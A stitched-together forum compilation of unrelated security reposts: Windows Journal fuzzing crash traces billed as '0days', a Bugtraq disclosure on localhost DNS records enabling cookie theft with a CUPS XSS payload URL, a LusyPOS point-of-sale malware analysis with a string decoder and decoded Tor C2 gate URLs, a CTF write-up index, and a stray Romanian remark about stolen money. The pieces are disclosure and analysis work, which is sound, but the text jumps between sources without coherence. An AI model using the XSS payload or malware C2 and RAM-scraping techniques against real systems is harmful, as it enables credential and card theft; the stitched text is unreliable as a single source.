000007fe`efd96717 MSPVWCTL!CEPDocView::AfterLoadDoc+0x165 00000000`0029f100 000007fe`efd9768f MSPVWCTL!CEPDocView::Commit+0xcb *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Windows Journal\Journal.exe 00000000`0029f160 00000001`3fc69920 MSPVWCTL!CEPDocView::put_Document+0x53 00000000`0029f1a0 00000001`3fc8b44d Journal+0x49920 00000000`0029f1f0 00000001`3fc816cd Journal+0x6b44d ddvptbflittlwwyifrhz.jnt (b04.1370): Unknown exception - code c0000374 (!!! second chance !!!) ntdll!RtlReportCriticalFailure+0x62: 00000000`77324102 eb00 jmp ntdll!RtlReportCriticalFailure+0x64 (00000000`77324104) 0:000> k Child-SP RetAddr Call Site 00000000`001dd460 00000000`77324746 ntdll!RtlReportCriticalFailure+0x62 00000000`001dd530 00000000`77325952 ntdll!RtlpReportHeapFailure+0x26 00000000`001dd560 00000000`77327604 ntdll!RtlpHeapHandleError+0x12 00000000`001dd590 00000000`772cdc1f ntdll!RtlpLogHeapFailure+0xa4 00000000`001dd5c0 000007fe`feeb10c8 ntdll! ?? ::FNODOBFM::`string'+0x10c54 00000000`001dd640 000007fe`eb66c2c2 msvcrt!free+0x1c 00000000`001dd670 000007fe`eb66b9a0 NBDoc!DecodePos+0x71a 00000000`001dd7e0 000007fe`eb673b05 NBDoc!CBLCDecode::DecodeWithClusters+0x868 00000000`001deae0 000007fe`eb673a07 NBDoc!CBLCDecode::Decode+0x3d 00000000`001deb10 000007fe`eb6bcd8c NBDoc!CBLCDecode::Decode+0x8b 00000000`001deb90 000007fe`eb6d02e2 NBDoc!DecodeBlcToCanvas+0x24c 00000000`001dec40 000007fe`eb6d096a NBDoc!CEPMRCFormatReader::LoadBLCToCanvas+0x142 00000000`001decb0 000007fe`eb6bfcfc NBDoc!CEPMRCFormatReader::RgnsToImageLayers+0x2aa 00000000`001dee00 000007fe`eb6be744 NBDoc!CIFD::GetMRCImages+0x54c 00000000`001def00 000007fe`eb6bdfa2 NBDoc!CIFD::GetCompositeLayer+0x4c4 00000000`001deff0 000007fe`eb650f2c NBDoc!CIFD::GetImageLayerEx+0x172 00000000`001df060 000007fe`eb650cd0 NBDoc!CEPEditablePageTiffImpl::InternalGetImageLayer+0x218 00000000`001df120 000007fe`f2bda523 NBDoc!CEPEditablePageTiffImpl::GetImageLayer+0x80 00000000`001df170 000007fe`f2be636a MSPVWCTL!CPage::EnableImageLayer+0xbb 00000000`001df1c0 000007fe`f2bd4210 MSPVWCTL!CPageDisplay::SetPageNum+0xb6 fiisfjwpxxywlwiqcowm.jnt (380.12f4): Access violation - code c0000005 (!!! second chance !!!) NBDoc!CopyToken+0x65: 000007fe`eb66bb31 44382c10 cmp byte ptr [rax+rdx],r13b ds:00000000`00db5a0d=?? 0:000> k Child-SP RetAddr Call Site 00000000`0014d7e0 000007fe`eb66c251 NBDoc!CopyToken+0x65 00000000`0014d810 000007fe`eb66b9a0 NBDoc!DecodePos+0x6a9 00000000`0014d980 000007fe`eb673b05 NBDoc!CBLCDecode::DecodeWithClusters+0x868 00000000`0014ec80 000007fe`eb673a07 NBDoc!CBLCDecode::Decode+0x3d 00000000`0014ecb0 000007fe`eb6bcd8c NBDoc!CBLCDecode::Decode+0x8b 00000000`0014ed30 000007fe`eb6d02e2 NBDoc!DecodeBlcToCanvas+0x24c 00000000`0014ede0 000007fe`eb6d096a NBDoc!CEPMRCFormatReader::LoadBLCToCanvas+0x142 00000000`0014ee50 000007fe`eb6bfcfc NBDoc!CEPMRCFormatReader::RgnsToImageLayers+0x2aa 00000000`0014efa0 000007fe`eb6be744 NBDoc!CIFD::GetMRCImages+0x54c 00000000`0014f0a0 000007fe`eb6bdfa2 NBDoc!CIFD::GetCompositeLayer+0x4c4 00000000`0014f190 000007fe`eb650f2c NBDoc!CIFD::GetImageLayerEx+0x172 00000000`0014f200 000007fe`eb650cd0 NBDoc!CEPEditablePageTiffImpl::InternalGetImageLayer+0x218 00000000`0014f2c0 000007fe`f2bda523 NBDoc!CEPEditablePageTiffImpl::GetImageLayer+0x80 00000000`0014f310 000007fe`f2be636a MSPVWCTL!CPage::EnableImageLayer+0xbb 00000000`0014f360 000007fe`f2bd4210 MSPVWCTL!CPageDisplay::SetPageNum+0xb6 00000000`0014f3c0 000007fe`f2bd56e6 MSPVWCTL!CMultiPageDisplayViewBase::AddPageD+0x1dc 00000000`0014f470 000007fe`f2bd4b40 MSPVWCTL!CDocViewBaseImpl::UpdateViewLayout+0x3ca 00000000`0014f5d0 000007fe`f2bb6245 MSPVWCTL!CDocViewBaseImpl::Recalc+0x3c 00000000`0014f620 000007fe`f2bb6717 MSPVWCTL!CEPDocView::AfterLoadDoc+0x165 00000000`0014f690 000007fe`f2bb768f MSPVWCTL!CEPDocView::Commit+0xcb rxamgbdcsmxhvlfyyabm.jnt (954.368): Access violation - code c0000005 (!!! second chance !!!) NBDoc!CEPMRCFormatReader::GetRegionImageInfo+0x90: 000007fe`ebb00430 488b4cd018 mov rcx,qword ptr [rax+rdx*8+18h] ds:00000000`003b1000=???????????????? 0:000> k Child-SP RetAddr Call Site 00000000`000eefe0 000007fe`ebb009eb NBDoc!CEPMRCFormatReader::GetRegionImageInfo+0x90 00000000`000ef010 000007fe`ebaefcfc NBDoc!CEPMRCFormatReader::RgnsToImageLayers+0x32b 00000000`000ef160 000007fe`ebaee744 NBDoc!CIFD::GetMRCImages+0x54c 00000000`000ef260 000007fe`ebaedfa2 NBDoc!CIFD::GetCompositeLayer+0x4c4 00000000`000ef350 000007fe`eba80f2c NBDoc!CIFD::GetImageLayerEx+0x172 00000000`000ef3c0 000007fe`eba80cd0 NBDoc!CEPEditablePageTiffImpl::InternalGetImageLayer+0x218 00000000`000ef480 000007fe`eb6ea523 NBDoc!CEPEditablePageTiffImpl::GetImageLayer+0x80 00000000`000ef4d0 000007fe`eb6f636a MSPVWCTL!CPage::EnableImageLayer+0xbb 00000000`000ef520 000007fe`eb6e4210 MSPVWCTL!CPageDisplay::SetPageNum+0xb6 00000000`000ef580 000007fe`eb6e56e6 MSPVWCTL!CMultiPageDisplayViewBase::AddPageD+0x1dc 00000000`000ef630 000007fe`eb6e4b40 MSPVWCTL!CDocViewBaseImpl::UpdateViewLayout+0x3ca 00000000`000ef790 000007fe`eb6c6245 MSPVWCTL!CDocViewBaseImpl::Recalc+0x3c 00000000`000ef7e0 000007fe`eb6c6717 MSPVWCTL!CEPDocView::AfterLoadDoc+0x165 00000000`000ef850 000007fe`eb6c768f MSPVWCTL!CEPDocView::Commit+0xcb *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Windows Journal\Journal.exe 00000000`000ef8b0 00000001`3fd19920 MSPVWCTL!CEPDocView::put_Document+0x53 00000000`000ef8f0 00000001`3fd3b44d Journal+0x49920 00000000`000ef940 00000001`3fd316cd Journal+0x6b44d 00000000`000ef990 00000001`3fd2bc8a Journal+0x616cd 00000000`000efcb0 00000001`3fd2a654 Journal+0x5bc8a *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MFC42u.dll - 00000000`000efd10 000007fe`ec65c8d6 Journal+0x5a654 oviykfqppyxljkodifhb.jnt (1350.1270): Access violation - code c0000005 (!!! second chance !!!) NBDoc!CopyToken+0x65: 000007fe`ebf4bb31 44382c10 cmp byte ptr [rax+rdx],r13b ds:00000000`0937cf42=?? 0:000> k Child-SP RetAddr Call Site 00000000`000fd740 000007fe`ebf4c251 NBDoc!CopyToken+0x65 00000000`000fd770 000007fe`ebf4b9a0 NBDoc!DecodePos+0x6a9 00000000`000fd8e0 000007fe`ebf53b05 NBDoc!CBLCDecode::DecodeWithClusters+0x868 00000000`000febe0 000007fe`ebf53a07 NBDoc!CBLCDecode::Decode+0x3d 00000000`000fec10 000007fe`ebf9cd8c NBDoc!CBLCDecode::Decode+0x8b 00000000`000fec90 000007fe`ebfb02e2 NBDoc!DecodeBlcToCanvas+0x24c 00000000`000fed40 000007fe`ebfb096a NBDoc!CEPMRCFormatReader::LoadBLCToCanvas+0x142 00000000`000fedb0 000007fe`ebf9fcfc NBDoc!CEPMRCFormatReader::RgnsToImageLayers+0x2aa 00000000`000fef00 000007fe`ebf9e744 NBDoc!CIFD::GetMRCImages+0x54c 00000000`000ff000 000007fe`ebf9dfa2 NBDoc!CIFD::GetCompositeLayer+0x4c4 00000000`000ff0f0 000007fe`ebf30f2c NBDoc!CIFD::GetImageLayerEx+0x172 00000000`000ff160 000007fe`ebf30cd0 NBDoc!CEPEditablePageTiffImpl::InternalGetImageLayer+0x218 00000000`000ff220 000007fe`efdba523 NBDoc!CEPEditablePageTiffImpl::GetImageLayer+0x80 00000000`000ff270 000007fe`efdc636a MSPVWCTL!CPage::EnableImageLayer+0xbb 00000000`000ff2c0 000007fe`efdb4210 MSPVWCTL!CPageDisplay::SetPageNum+0xb6 00000000`000ff320 000007fe`efdb56e6 MSPVWCTL!CMultiPageDisplayViewBase::AddPageD+0x1dc 00000000`000ff3d0 000007fe`efdb4b40 MSPVWCTL!CDocViewBaseImpl::UpdateViewLayout+0x3ca 00000000`000ff530 000007fe`efd96245 MSPVWCTL!CDocViewBaseImpl::Recalc+0x3c 00000000`000ff580 000007fe`efd96717 MSPVWCTL!CEPDocView::AfterLoadDoc+0x165 00000000`000ff5f0 000007fe`efd9768f MSPVWCTL!CEPDocView::Commit+0xcb fkdmtsxkowdcnxpyjqfj.jnt (478.1128): Access violation - code c0000005 (!!! second chance !!!) msvcrt!memset+0xb0: 000007fe`feec58e3 480fc311 movnti qword ptr [rcx],rdx ds:00000000`00000000=???????????????? 0:000> k Child-SP RetAddr Call Site 00000000`0022d738 000007fe`eb20b333 msvcrt!memset+0xb0 00000000`0022d740 000007fe`eb213b05 NBDoc!CBLCDecode::DecodeWithClusters+0x1fb 00000000`0022ea40 000007fe`eb213a07 NBDoc!CBLCDecode::Decode+0x3d 00000000`0022ea70 000007fe`eb25cd8c NBDoc!CBLCDecode::Decode+0x8b 00000000`0022eaf0 000007fe`eb2702e2 NBDoc!DecodeBlcToCanvas+0x24c 00000000`0022eba0 000007fe`eb27096a NBDoc!CEPMRCFormatReader::LoadBLCToCanvas+0x142 00000000`0022ec10 000007fe`eb25fcfc NBDoc!CEPMRCFormatReader::RgnsToImageLayers+0x2aa 00000000`0022ed60 000007fe`eb25e744 NBDoc!CIFD::GetMRCImages+0x54c 00000000`0022ee60 000007fe`eb25dfa2 NBDoc!CIFD::GetCompositeLayer+0x4c4 00000000`0022ef50 000007fe`eb1f0f2c NBDoc!CIFD::GetImageLayerEx+0x172 00000000`0022efc0 000007fe`eb1f0cd0 NBDoc!CEPEditablePageTiffImpl::InternalGetImageLayer+0x218 00000000`0022f080 000007fe`eba5a523 NBDoc!CEPEditablePageTiffImpl::GetImageLayer+0x80 00000000`0022f0d0 000007fe`eba6636a MSPVWCTL!CPage::EnableImageLayer+0xbb 00000000`0022f120 000007fe`eba54210 MSPVWCTL!CPageDisplay::SetPageNum+0xb6 00000000`0022f180 000007fe`eba556e6 MSPVWCTL!CMultiPageDisplayViewBase::AddPageD+0x1dc 00000000`0022f230 000007fe`eba54b40 MSPVWCTL!CDocViewBaseImpl::UpdateViewLayout+0x3ca 00000000`0022f390 000007fe`eba36245 MSPVWCTL!CDocViewBaseImpl::Recalc+0x3c 00000000`0022f3e0 000007fe`eba36717 MSPVWCTL!CEPDocView::AfterLoadDoc+0x165 00000000`0022f450 000007fe`eba3768f MSPVWCTL!CEPDocView::Commit+0xcb *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Windows Journal\Journal.exe 00000000`0022f4b0 00000001`3f5d9920 MSPVWCTL!CEPDocView::put_Document+0x53 Sursa: Windows Journal has a lot of 0days! - Pastebin.com

From: Tavis Ormandy <taviso () sdf lonestar org> Date: Fri, 18 Jan 2008 16:40:58 +0000 Hello, I'd like to document what appears to be a common named misconfiguration that can result in a minor security issue with web applications. It's a common and sensible practice to install records of the form "localhost. IN A 127.0.0.1" into nameserver configurations, bizarrely however, administrators often mistakenly drop the trailing dot, introducing an interesting variation of Cross-Site Scripting (XSS) I call Same-Site Scripting. The missing dot indicates that the record is not fully qualified, and thus queries of the form "localhost.example.com" are resolved. While superficially this may appear to be harmless, it does in fact allow an attacker to cheat the RFC2109 (HTTP State Management Mechanism) same origin restrictions, and therefore hijack state management data. The result of this minor misconfiguration is that it is impossible to access sites in affected domains securely from multi-user systems. The attack is trivial, for example, from a shared UNIX system, an attacker listens on an unprivileged port[0] and then uses a typical XSS attack vector (e.g. <img src=...> in an html email) to lure a victim into requesting http://localhost.example.com:1024/example.gif, logging the request. The request will include the RFC2109 Cookie header, which could then be used to steal credentials or interact with the affected service as if they were the victim. Another attack vector exists where a victim connects to a site from (or via) a machine that hosts another website, any XSS-like flaw or reflective web service on the hosted website can therefore be exploited in the context of the misconfigured domain. This would also affect users who connect via a shared caching http proxy machine, that also hosts an http daemon. An excellent example of exploiting this misconfiguration was discovered by my colleague, Will Drewry, in CUPS. http://localhost.example.com:631/jobs/?job_id=&job_printer_name=Click%20Me&job_printer_uri=javascript:alert(document.cookie) This misconfiguration allows any of the domains affected to be vulnerable to this issue via CUPS (installed on most UNIX, Linux, Mac systems). The bug requires a click to be exploited, but illustrates the problem nicely. Initial analysis shows that some of the worlds most popular websites are affected. The administrators of the example domains listed below were sent a draft of this email 7 days before release, so some (or all) may have been corrected, these examples are simply intended to demonstrate how widespread this problem is. localhost.microsoft.com has address 127.0.0.1 localhost.ebay.com has address 127.0.0.1 localhost.yahoo.com has address 127.0.0.1 localhost.fbi.gov has address 127.0.0.1 localhost.citibank.com has address 127.0.0.1 localhost.cisco.com has address 127.0.0.1 etc. Recommendations It is advised that non-FQ localhost entries be removed from nameserver configurations for domains that host websites that rely on HTTP state management. Of course, any other records that return RFC1918 or RFC3330 reserved addresses should also be carefully examined for similar issues. Additionally, those practising blackhole routing via dns to mitigate denial of service attacks against specific hostnames should avoid the temptation to resolve targets to 127.0.0.1 or similar addresses for sensitive domains. [0] It appears to be a common mistake to confuse the JavaScript SOP and the HTTP originating host definition for Cookies with regard to port number. The JavaScript SOP (http://www.mozilla.org/projects/security/components/same-origin.html) does include the port number, where as RFC2109 (http://www.ietf.org/rfc/rfc2109.txt) explicitly does not. This behaviour is arguably incorrect, making it impossible to securely host a website from a multi-user machine, but nevertheless is the case, and is implemented by most major browsers. Thanks to Will Drewry, Robert Swiecki, and Filipe Almeida for their valuable assistance researching this topic. -- ------------------------------------- taviso () sdf lonestar org | finger me for my gpg key. ------------------------------------------------------- Sursa: Bugtraq: common dns misconfiguration can lead to "same site" scripting

LusyPOS and Tor By Nick Hoffman and Jeremy Humble Introduction At our dayjobs, as reverse engineers at CBTS, Jeremy and I have been hunting new POS malware. A new sample appeared on Virustotal this week that had a very interesting name “lusypos.exe”. There have been very few references to this particular family and it appears to be fairly new. Google searching was able to give me the following information: The sample that I’ll be talking about in this post is bc7bf2584e3b039155265642268c94c7. At the time of this writing the malware is currently flagged on Virustotal by 7/54 engines. Interestingly, some of the signatures seem to be hitting on the copy of tor.exe that is in the bundle. Analysis This malware clocks in around 4.0 MB in size, so it’s not small. For comparison, getmypass POS malware was 17k in size. The first thing of note when executing this in a sandbox is that this malware drops a copy of tor.exe, libcurl.dll, and zlib1.dll. It also copies itself to the %APPDATA% directory on the victim host. The following are the locations and MD5’s of the dropped files are below: The file mbambservice.exe is the copy of tor.exe d0f3b3aaa109a1ea8978c83d23055eb1 C:\Documents and Settings\<USER>\Application Data\VeriFone32\libcurl.dll 4407393c1542782bac2ba9d017f27dc9 C:\Documents and Settings\<USER>\Application Data\VeriFone32\mbambservice.exe bc7bf2584e3b039155265642268c94c7 C:\Documents and Settings\<USER>\Application Data\VeriFone32\verifone32.exe b8a9e91134e7c89440a0f95470d5e47b C:\Documents and Settings\<USER>\Application Data\VeriFone32\zlib1.dll The malware will also create the mutex “prowin32Mutex” and injects code into iexplore.exe. This was a strange mix of dexter-like behavior mixed with Chewbacca-like techniques. While running in a sandbox, the malware communicated out to 86.59.21.38 212.112.245.170 128.31.0.39 154.35.32.5 193.23.244.244 Now let’s get to the good stuff. Decoding The malware has an interesting method of decoding strings that are statically defined in the binary. For the non-asm folks on here, the malware is using a lookup table with structures containing a one byte xor key, pointer to the string, and length of the string. It will perform an additional xor operation at the end. A decoder for this is written (in python below) #!/usr/bin/env python # ----------------------------------------------------------------------------- # # Author: Jeremy Humble - CBTS ACS # Description: POC LusyPOC String Extractor. Strings are stored in an array # of 8 byte structs with the following structure: {short xor_key, # short length, char* encoded_string} # ----------------------------------------------------------------------------- # import sys import struct import binascii import pefile import simplejson as json from pprint import pprint from optparse import OptionParser # Option Parsing usage = "lusypos_parser.py [-j] lusypos_sample1 [lusypos_sample2] ..." opt_parser = OptionParser(usage=usage) opt_parser.add_option("-j", "--json", action="store_true",dest="json_output", help="Output all information on each string in json format") opt_parser.add_option("-p", "--pretty", action="store_true",dest="pretty_json_output", help="Output all information on each string in pretty json format") (options, args) = opt_parser.parse_args() if options.json_output and options.pretty_json_output: sys.stderr.write('Use either -j or -p, not both') exit() class LusyEncodedString: def __init__(self,raw_data,file_content,pe): self.xor_key = struct.unpack('H',raw_data[0:2])[0] self.length = struct.unpack('H',raw_data[2:4])[0] self.virtual_offset = struct.unpack('I', raw_data[4:8])[0] self.raw_offset = pe.get_offset_from_rva(self.virtual_offset - pe.OPTIONAL_HEADER.ImageBase) self.encoded_str = file_content[self.raw_offset:self.raw_offset+self.length] self._decode() def _decode(self): self.decoded_str = "" for i in range(0,self.length): self.decoded_str += chr(ord(self.encoded_str[i]) ^ self.xor_key ^ i) def __str__(self): return str(self.to_dict()) def to_dict(self): d = {'xor key': hex(self.xor_key), 'length': self.length, 'raw offset': hex(self.raw_offset), 'virtual offset': hex(self.virtual_offset), 'encoded string': self.encoded_str, 'decoded string': self.decoded_str} return d # For now we'll assume the table is always at RVA 401000 (raw 0x400) as hardcoded in bc7bf2584e3b039155265642268c94c7 # With a little more refinement this could probably be found dynamically. AFAIK it's always located at 0x401000. # Until I see a sample that shows otherwise, there's no point in doing this def parse_table(content,pe,table_rva=0x1000): encoded_strings = [] raw_offset = pe.get_physical_by_rva(table_rva) i = 0 while True: raw_struct = content[raw_offset+i*8:raw_offset+i*8+8] # The last struct in the table is all null bytes. Stop parsing when we hit it if struct.unpack('<Q',raw_struct)[0] == 0: break else: try: encoded_strings.append(LusyEncodedString(raw_struct,content,pe)) except Exception as e: sys.stderr.write('Error processing entry "%s" with Exception "%s". Ending' ' table processing\n' % (binascii.hexlify(raw_struct),e)) i += 1 return encoded_strings if __name__ == '__main__': fname_to_lusy_string_map = {} for arg in args: try: pe = pefile.PE(arg) with open(arg,'r') as fp: content = fp.read() fname_to_lusy_string_map[arg] = parse_table(content,pe) except Exception as e: sys.stderr.write('Exception processing file %s: "%s"\n' % (arg,e)) if options.json_output or options.pretty_json_output: json_dict = {} # Call to_dict on all of the objects so we can dump json for fname, lusy_strings in fname_to_lusy_string_map.items(): json_dict[fname] = [] for lusy_str in lusy_strings: json_dict[fname].append(lusy_str.to_dict()) # If only working on one file, omit the top level filename key since it's obvious if len(json_dict.keys()) == 1: json_dict = json_dict[json_dict.keys()[0]] if options.json_output: print json.dumps(json_dict) else: pprint(json_dict) else: for fname, lusy_strings in fname_to_lusy_string_map.items(): for lusy_str in lusy_strings: print lusy_str.decoded_str Which when executed will decode the following strings: http://kcdjqxk4jjwzjopq.onion/d/gw.php http://ydoapqgxeqmvsugz.onion/d/gw.php VeriFone32 verifone32 prowin32Mutex b00n v1.1 \\Internet Explorer\\iexplore.exe mbambservice.exe tor.exe zlib1.dll libcurl.dll Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0 LowRiskFileTypes Content-Type: application/x-www-form-urlencoded 127.0.0.1:9050 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) g00n curl_easy_init curl_easy_setopt curl_easy_cleanup curl_easy_perform curl_easy_strerror curl_slist_append curl_easy_getinfo curl_slist_free_all page= &ump= &ks= &opt= &unm= &cnm= &view= &spec= &query= &val= &var= DetectShutdownClass download- update- checkin: scanin: uninstall response= UpdateMutex: Software\\Verifone32 Software\\Microsoft\\Windows\\CurrentVersion\\Run .DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run mbambservice.exe wmiprvse.exe LogonUI.exe svchost.exe iexplore.exe explorer.exe System smss.exe csrss.exe winlogon.exe lsass.exe spoolsv.exe alg.exe wuauclt.exe firefox.exe chrome.exe devenv.exe This contains the C2 information, along with a process whitelist, and registry keys for persistence. One thing to note based on these strings, is that it looks like the malware may have taken a cue from dexter. RAM Scraping RAM scraping is performed through the common sequence of using CreateToolhelp32Snapshot, then using Process32First and Process32Next to iterate. Pseudocode for that would look something like the following: handle = CreateToolhelp32Snapshot Process32First(handle) do sleep 1000 OpenProcess VirtualQueryEx ReadProcessMemory CloseHandle Sleep 5000 while Process32Next This technique is not new and is commonly used in many different POS Ram scrapers. Truth is, that without writing a driver, the malware authors often have their hands tied and only have a few techniques to peer into process memory space. CC Validation The malware also contains methods to search memory for sequences of data that look like credit card track information. Once it finds that data, there are checks against the potential credit card number to determine if it is Luhn valid. Luhn’s algorithm is the defacto algorithm for validating credit card numbers. It can be seen implemented in the malware using a lookup table rather than calcuating the digital root. One note, is that this is the same implementation of Luhn’s as FrameworkPOS, Dexter, and getmypass. Closing Thoughts When looking into malware families like Chewbacca and now LusyPOS, one thought comes to mind. Why would a POS machine be allowed to talk to tor? Most PCI audits will attempt to lock this sort of activity down, but there seems to be devils in the implementation that allow malware like this to be successful. This is just a scratch in the surface of a new malware family. We’ll be curious to watch it evolve over the next couple years and track its progress. LusyPOS and Tor was published on December 01, 2014. Sursa: LusyPOS and Tor – Adventures in Security

[h=1]9447 CTF 2014 write-ups[/h] https://9447.plumbing/ Scoreboard @9447CTF on Twitter [h=2]Info[/h] Flags are of the format 9447{[0-9a-zA-Z_]+}. Please submit the entire flag, including 9447{}. [h=2]Completed write-ups[/h] bashful insanity_check ramble tumorous [h=2]Incomplete write-ups[/h] blockchain booty classy coffee coor coor doom6 europe01 europe02 europe03 fuckpyjails future geocap hellomike johnlions no strings attached nosql polydata rolling securestore shmap Sursa: https://github.com/ctfs/write-ups/tree/master/9447-ctf-2014

E vorba de cateva mii de euro, sau ai furat 10 RON de la parinti?